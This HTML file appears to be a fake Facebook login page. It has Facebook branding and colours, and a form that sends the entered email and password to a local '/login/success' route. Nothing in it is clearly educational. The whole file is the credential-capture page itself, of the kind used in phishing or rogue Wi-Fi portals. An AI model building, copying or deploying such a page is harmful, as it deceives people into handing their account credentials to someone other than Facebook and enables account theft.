<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        body {
            font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
            color: whitesmoke;
            background-color: #3B5999;
            text-align: center;
        }

        

        .container {
        display: block;
        margin-top: 30%;
        }

        #username {
            width: 90%;
            height: 2rem;
        }

        #password {
            width: 90%;
            height: 2rem;
            margin-bottom: 0.5rem;
        }

        #button {
            width: 92%;
            height: 3rem;
            font-size: large;
            background-color: #607fc2;
            color: whitesmoke;
            border: 0.1rem solid whitesmoke;
        }

    </style>
</head>
<body>
    <div class="container">
    <h1>Facebook</h1>
    <form action="/login/success" method="post">
    <input type="text" name="email" value="" id="username" autofocus placeholder="Email">
    <br>
    <input type="password" name="password" value="" id="password" placeholder="Password">
    <br>
    <button type="submit" id="button">Log In</button>
    </form>
    </div>

    <script>

    </script>
</body>
</html>